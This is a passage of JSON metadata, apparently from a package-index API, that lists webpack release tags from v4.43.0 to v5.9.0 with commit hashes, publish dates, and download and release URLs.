v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e